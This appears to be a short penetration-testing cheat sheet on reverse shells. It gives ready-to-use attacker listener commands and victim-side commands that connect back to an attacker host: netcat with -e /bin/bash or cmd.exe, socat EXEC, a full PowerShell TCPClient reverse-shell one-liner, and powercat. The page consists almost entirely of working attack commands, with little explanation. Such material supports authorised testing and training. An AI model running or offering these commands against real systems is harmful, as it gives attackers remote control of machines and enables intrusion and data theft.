Reverse Shells
Working with and using reverse shells
- Reverse shells work by running a command that launches a shell on a target system and connects back to your system. Many tools can be used for this.
1
# Create a listener on local host (attacker)
2
nc -nvlp 4123
3
4
# Execute on victim
5
nc -nv <attacker IP> 4123 -e /bin/bash # Linux victim
6
nc -nv <attacker IP> 4123 -e cmd.exe # Windows victim
- If you don't add
-d -dto the listener command, you won't see when the connection happens.
1
# Create a listener on local host (attacker)
2
sudo socat -d -d TCP4-LISTEN:443 STDOUT
3
4
# Execute on victim
5
socat TCP4:192.168.127.133:443 EXEC:/bin/bash # Linux victim
6
socat TCP4:192.168.127.133:443 EXEC:'cmd.exe',pipes # Windows victim
1
# Create a listener on local host (attacker)
2
sudo nc -lnvp 443
3
4
# Execute on victim (windows)
5
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER IP',ATTACKER PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
- Powercat will need to be on the Windows victim first so either download it or transfer the binary from the attacker machine.
# Create a listener on local host (attacker)
sudo nc -lnvp 443
# Execute on victim (windows)
. .\powercat.ps1
powercat -c <ATTACKER IP> -p 443 -e cmd.exe
Last modified 1mo ago